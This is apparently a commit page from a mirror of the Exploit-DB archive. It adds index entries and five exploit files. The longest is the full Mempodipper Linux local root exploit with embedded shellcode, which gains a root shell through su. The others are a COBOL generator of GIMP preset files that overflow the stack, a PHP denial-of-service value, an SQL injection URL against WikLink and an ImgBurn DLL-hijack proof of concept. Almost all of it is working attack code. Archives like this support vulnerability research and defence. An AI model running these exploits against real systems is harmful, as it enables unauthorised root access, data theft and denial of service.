bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 11_07_2014

Browse source
This commit is contained in:
Offensive Security 2014-11-07 04:45:10 +00:00
parent ffc4f99bcc
commit 025d2b1b6e
6 changed files with 495 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -31669,3 +31669,8 @@ id,file,description,date,author,platform,type,port
35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0 35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0
35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0 35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0
35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0 35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0
35161,platforms/linux/local/35161.txt,"Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2",2012-01-12,zx2c4,linux,local,0
35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0
35163,platforms/windows/dos/35163.c,"ImgBurn 2.4 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-01-01,d3c0der,windows,dos,0
35164,platforms/php/dos/35164.php,"PHP <= 5.3.2 'zend_strtod()' Function Floating-Point Value Denial of Service Vulnerability",2011-01-03,"Rick Regan",php,dos,0
35165,platforms/php/webapps/35165.txt,"WikLink 0.1.3 'getURL.php' SQL Injection Vulnerability",2011-01-05,"Aliaksandr Hartsuyeu",php,webapps,0

Can't render this file because it is too large.

162
platforms/linux/dos/35162.cob Executable file
View file

@ -0,0 +1,162 @@
source: http://www.securityfocus.com/bid/45647/info
GIMP is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate checks on user-supplied input.
Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
GIMP 2.6.11 is vulnerable; other versions may also be affected.
000010 IDENTIFICATION DIVISION.
000020 PROGRAM-ID. GIMP-OVERFLOWS-POC-IN-COBOL.
000030 AUTHOR. NON-CUSTOMERS CREW.
000040*SHOE SIZE DECLARATION. 43.
000050
000060 ENVIRONMENT DIVISION.
000070 INPUT-OUTPUT SECTION.
000080 FILE-CONTROL.
000090 SELECT FILE01 ASSIGN TO "GIMP01.LIGHTINGPRESETS"
000100 ORGANIZATION IS LINE SEQUENTIAL.
000110 SELECT FILE02 ASSIGN TO "GIMP02.SPHEREDESIGNER"
000120 ORGANIZATION IS LINE SEQUENTIAL.
000130 SELECT FILE03 ASSIGN TO "GIMP03.GFIG"
000140 ORGANIZATION IS LINE SEQUENTIAL.
000150* FOR THE 4TH OVERFLOW, SEE BELOW.
000160
000170 DATA DIVISION.
000180 FILE SECTION.
000190 FD FILE01.
000200 01 PRINTLINE PIC X(800).
000210 FD FILE02.
000220 01 QRINTLINE PIC X(800).
000230 FD FILE03.
000240 01 RRINTLINE PIC X(800).
000250
000260 WORKING-STORAGE SECTION.
000270 01 TEXT-OUT1 PIC X(29) VALUE 'Number of lights: 1'.
000280 01 TEXT-OUT2 PIC X(29) VALUE 'Type: Point'.
000290 01 TEXT-OUT3 PIC X(29) VALUE 'Position: A'.
000300 01 TEXT-OUT4 PIC X(29) VALUE 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
000310 01 TEXT-OUT5 PIC X(29) VALUE ' -1 1'.
000320 01 TEXT-OUT6 PIC X(29) VALUE 'Direction: -1 -1 1'.
000330 01 TEXT-OUT7 PIC X(29) VALUE 'Color: 1 1 1'.
000340 01 TEXT-OUT8 PIC X(29) VALUE 'Intensity: 1'.
000350 01 TEXU-OUT1 PIC X(29) VALUE '0 0 A'.
000360 01 TEXU-OUT2 PIC X(29) VALUE 'A 1 1 1 0 0 0 1 1 0 1 1 1 1 1'.
000370 01 TEXU-OUT3 PIC X(29) VALUE '0 0 0 0 0 0 0'.
000380 01 TEXV-OUT1 PIC X(29) VALUE 'GFIG Version 0.2'.
000390 01 TEXV-OUT2 PIC X(29) VALUE 'Name: First\040Gfig'.
000400 01 TEXV-OUT3 PIC X(29) VALUE 'Version: 0.000000'.
000410 01 TEXV-OUT4 PIC X(29) VALUE 'ObjCount: 0'.
000420 01 TEXV-OUT5 PIC X(29) VALUE '<OPTIONS>'.
000430 01 TEXV-OUT6 PIC X(29) VALUE 'GridSpacing: 30'.
000440 01 TEXV-OUT7 PIC X(29) VALUE 'GridType: RECT_GRID'.
000450 01 TEXV-OUT8 PIC X(29) VALUE 'DrawGrid: FALSE'.
000460 01 TEXV-OUT9 PIC X(29) VALUE 'Snap2Grid: FALSE'.
000470 01 TEXV-OUTA PIC X(29) VALUE 'LockOnGrid: FALSE'.
000480 01 TEXV-OUTB PIC X(29) VALUE 'ShowControl: TRUE'.
000490 01 TEXV-OUTC PIC X(29) VALUE '</OPTIONS>'.
000500 01 TEXV-OUTD PIC X(29) VALUE '<Style Base>'.
000510 01 TEXV-OUTE PIC X(29) VALUE 'BrushName: Circle (11)'.
000520 01 TEXV-OUTF PIC X(29) VALUE 'PaintType: 1'.
000530 01 TEXV-OUTG PIC X(29) VALUE 'FillType: 0'.
000540 01 TEXV-OUTH PIC X(29) VALUE 'FillOpacity: 100'.
000550 01 TEXV-OUTI PIC X(29) VALUE 'Pattern: Pine'.
000560 01 TEXV-OUTJ PIC X(29) VALUE 'Gradient: FG to BG (RGB)'.
000570 01 TEXV-OUTK PIC X(29) VALUE 'Foreground: A'.
000580 01 TEXV-OUTL PIC X(29) VALUE 'AA 0 0 1'.
000590 01 TEXV-OUTM PIC X(29) VALUE 'Background: 1 1 1 1'.
000600 01 TEXV-OUTN PIC X(29) VALUE '</Style>'.
000610
000620 PROCEDURE DIVISION.
000630 MAIN-PARAGRAPH.
000640* 1. FILTERS > LIGHT AND SHADOW > LIGHTING EFFECTS > LIGHT > OPEN
000650 OPEN OUTPUT FILE01.
000660 WRITE PRINTLINE FROM TEXT-OUT1.
000670 WRITE PRINTLINE FROM TEXT-OUT2.
000680 WRITE PRINTLINE FROM TEXT-OUT3 AFTER ADVANCING 0 LINES.
000690 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000700 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000710 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000720 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000730 WRITE PRINTLINE FROM TEXT-OUT5.
000740 WRITE PRINTLINE FROM TEXT-OUT6.
000750 WRITE PRINTLINE FROM TEXT-OUT7.
000760 WRITE PRINTLINE FROM TEXT-OUT8.
000770 CLOSE FILE01.
000780
000790* 2. FILTERS > RENDER > SPHERE DESIGNER > OPEN
000800 OPEN OUTPUT FILE02.
000810 WRITE QRINTLINE FROM TEXU-OUT1 AFTER ADVANCING 0 LINES.
000820 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000830 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000840 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000850 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000860 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000870 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000880 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000890 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000900 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000910 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000920 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000930 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000940 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000950 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000960 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000970 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000980 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000990 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001000 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001010 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001020 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001030 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001040 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001050 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001060 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001070 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001080 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001090 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001100 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001110 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001120 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001130 WRITE QRINTLINE FROM TEXU-OUT2 AFTER ADVANCING 0 LINES.
001140 WRITE QRINTLINE FROM TEXU-OUT3.
001150 CLOSE FILE02.
001160
001170* 3. FILTERS > RENDER > GFIG > FILE > OPEN
001180 OPEN OUTPUT FILE03.
001190 WRITE RRINTLINE FROM TEXV-OUT1.
001200 WRITE RRINTLINE FROM TEXV-OUT2.
001210 WRITE RRINTLINE FROM TEXV-OUT3.
001220 WRITE RRINTLINE FROM TEXV-OUT4.
001230 WRITE RRINTLINE FROM TEXV-OUT5.
001240 WRITE RRINTLINE FROM TEXV-OUT6.
001250 WRITE RRINTLINE FROM TEXV-OUT7.
001260 WRITE RRINTLINE FROM TEXV-OUT8.
001270 WRITE RRINTLINE FROM TEXV-OUT9.
001280 WRITE RRINTLINE FROM TEXV-OUTA.
001290 WRITE RRINTLINE FROM TEXV-OUTB.
001300 WRITE RRINTLINE FROM TEXV-OUTC.
001310 WRITE RRINTLINE FROM TEXV-OUTD.
001320 WRITE RRINTLINE FROM TEXV-OUTE.
001330 WRITE RRINTLINE FROM TEXV-OUTF.
001340 WRITE RRINTLINE FROM TEXV-OUTG.
001350 WRITE RRINTLINE FROM TEXV-OUTH.
001360 WRITE RRINTLINE FROM TEXV-OUTI.
001370 WRITE RRINTLINE FROM TEXV-OUTJ.
001380 WRITE RRINTLINE FROM TEXV-OUTK AFTER ADVANCING 0 LINES.
001390 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001400 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001410 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001420 WRITE RRINTLINE FROM TEXV-OUTL.
001430 WRITE RRINTLINE FROM TEXV-OUTM.
001440 WRITE RRINTLINE FROM TEXV-OUTN.
001450 CLOSE FILE03.
001460
001470* 4. THE FUNCTION "read_channel_data()" IN plug-ins/common/file-psp.c HAS AN
001480* OVERFLOW WHEN HANDLING PSP_COMP_RLE TYPE FILES. A MALICIOUS FILE THAT
001490* STARTS A LONG RUNCOUNT AT THE END OF AN IMAGE WILL WRITE OUTSIDE OF
001500* ALLOCATED MEMORY. WE DON'T HAVE A POC FOR THIS BUG.
001510
001520* HAPPY NEW YEAR!!! http://rock-madrid.com/
001530
001540 STOP RUN.

291
platforms/linux/local/35161.txt Executable file
View file

@ -0,0 +1,291 @@
/*Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
Blog post about it is here: http://blog.zx2c4.com/749
*/
/*
* Mempodipper
* by zx2c4
*
* Linux Local Root Exploit
*
* Rather than put my write up here, per usual, this time I've put it
* in a rather lengthy blog post: http://blog.zx2c4.com/749
*
* Enjoy.
*
* - zx2c4
* Jan 21, 2012
*
* CVE-2012-0056
*/
#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/ptrace.h>
#include <sys/reg.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>
char *prog_name;
int send_fd(int sock, int fd)
{
char buf[1];
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmsg;
int n;
char cms[CMSG_SPACE(sizeof(int))];
buf[0] = 0;
iov.iov_base = buf;
iov.iov_len = 1;
memset(&msg, 0, sizeof msg);
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = (caddr_t)cms;
msg.msg_controllen = CMSG_LEN(sizeof(int));
cmsg = CMSG_FIRSTHDR(&msg);
cmsg->cmsg_len = CMSG_LEN(sizeof(int));
cmsg->cmsg_level = SOL_SOCKET;
cmsg->cmsg_type = SCM_RIGHTS;
memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
return -1;
close(sock);
return 0;
}
int recv_fd(int sock)
{
int n;
int fd;
char buf[1];
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmsg;
char cms[CMSG_SPACE(sizeof(int))];
iov.iov_base = buf;
iov.iov_len = 1;
memset(&msg, 0, sizeof msg);
msg.msg_name = 0;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = (caddr_t)cms;
msg.msg_controllen = sizeof cms;
if ((n = recvmsg(sock, &msg, 0)) < 0)
return -1;
if (n == 0)
return -1;
cmsg = CMSG_FIRSTHDR(&msg);
memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
close(sock);
return fd;
}
unsigned long ptrace_address()
{
int fd[2];
printf("[+] Creating ptrace pipe.\n");
pipe(fd);
fcntl(fd[0], F_SETFL, O_NONBLOCK);
printf("[+] Forking ptrace child.\n");
int child = fork();
if (child) {
close(fd[1]);
char buf;
printf("[+] Waiting for ptraced child to give output on syscalls.\n");
for (;;) {
wait(NULL);
if (read(fd[0], &buf, 1) > 0)
break;
ptrace(PTRACE_SYSCALL, child, NULL, NULL);
}
printf("[+] Error message written. Single stepping to find address.\n");
struct user_regs_struct regs;
for (;;) {
ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
wait(NULL);
ptrace(PTRACE_GETREGS, child, NULL, &regs);
#if defined(__i386__)
#define instruction_pointer regs.eip
#define upper_bound 0xb0000000
#elif defined(__x86_64__)
#define instruction_pointer regs.rip
#define upper_bound 0x700000000000
#else
#error "That platform is not supported."
#endif
if (instruction_pointer < upper_bound) {
unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
return instruction_pointer;
}
}
} else {
printf("[+] Ptrace_traceme'ing process.\n");
if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) {
perror("[-] ptrace");
return 0;
}
close(fd[0]);
dup2(fd[1], 2);
execl("/bin/su", "su", "not-a-valid-user", NULL);
}
return 0;
}
unsigned long objdump_address()
{
FILE *command = popen("objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
if (!command) {
perror("[-] popen");
return 0;
}
char result[32];
fgets(result, 32, command);
pclose(command);
return strtoul(result, NULL, 16);
}
unsigned long find_address()
{
printf("[+] Ptracing su to find next instruction without reading binary.\n");
unsigned long address = ptrace_address();
if (!address) {
printf("[-] Ptrace failed.\n");
printf("[+] Reading su binary with objdump to find exit@plt.\n");
address = objdump_address();
if (address == ULONG_MAX || !address) {
printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name);
exit(-1);
}
}
printf("[+] Resolved call address to 0x%lx.\n", address);
return address;
}
int su_padding()
{
printf("[+] Calculating su padding.\n");
FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r");
if (!command) {
perror("[-] popen");
exit(1);
}
char result[256];
fgets(result, 256, command);
pclose(command);
return strstr(result, "this-user-does-not-exist") - result;
}
int child(int sock)
{
char parent_mem[256];
sprintf(parent_mem, "/proc/%d/mem", getppid());
printf("[+] Opening parent mem %s in child.\n", parent_mem);
int fd = open(parent_mem, O_RDWR);
if (fd < 0) {
perror("[-] open");
return 1;
}
printf("[+] Sending fd %d to parent.\n", fd);
send_fd(sock, fd);
return 0;
}
int parent(unsigned long address)
{
int sockets[2];
printf("[+] Opening socketpair.\n");
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {
perror("[-] socketpair");
return 1;
}
if (fork()) {
printf("[+] Waiting for transferred fd in parent.\n");
int fd = recv_fd(sockets[1]);
printf("[+] Received fd at %d.\n", fd);
if (fd < 0) {
perror("[-] recv_fd");
return 1;
}
printf("[+] Assigning fd %d to stderr.\n", fd);
dup2(2, 15);
dup2(fd, 2);
unsigned long offset = address - su_padding();
printf("[+] Seeking to offset 0x%lx.\n", offset);
lseek64(fd, offset, SEEK_SET);
#if defined(__i386__)
// See shellcode-32.s in this package for the source.
char shellcode[] =
"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
"\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
"\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
"\x80";
#elif defined(__x86_64__)
// See shellcode-64.s in this package for the source.
char shellcode[] =
"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
"\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
"\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
"\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
"\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
printf("[+] Executing su with shellcode.\n");
execl("/bin/su", "su", shellcode, NULL);
} else {
char sock[32];
sprintf(sock, "%d", sockets[0]);
printf("[+] Executing child from child fork.\n");
execl("/proc/self/exe", prog_name, "-c", sock, NULL);
}
return 0;
}
int main(int argc, char **argv)
{
prog_name = argv[0];
if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c')
return child(atoi(argv[2]));
printf("===============================\n");
printf("= Mempodipper =\n");
printf("= by zx2c4 =\n");
printf("= Jan 21, 2012 =\n");
printf("===============================\n\n");
if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
return parent(strtoul(argv[2], NULL, 16));
else
return parent(find_address());
}

9
platforms/php/dos/35164.php Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45668/info
PHP is prone to a remote denial-of-service vulnerability.
Successful attacks will cause applications written in PHP to hang, creating a denial-of-service condition.
PHP 5.3.3 is vulnerable; other versions may also be affected.
<?php $d = 2.2250738585072011e-308; ?>

9
platforms/php/webapps/35165.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45673/info
WikLink is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
WikLink 0.1.3 is vulnerable; other versions may also be affected.
http://www.example.com/wiklink/getURL.php?id=-1' union select 1111/*

19
platforms/windows/dos/35163.c Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/45657/info
ImgBurn is prone to an arbitrary-code-execution vulnerability.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
ImgBurn 2.4.0.0 is vulnerable; other versions may also be affected.
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }
int egg()
{
system ("calc");
exit(0);
return 0;
}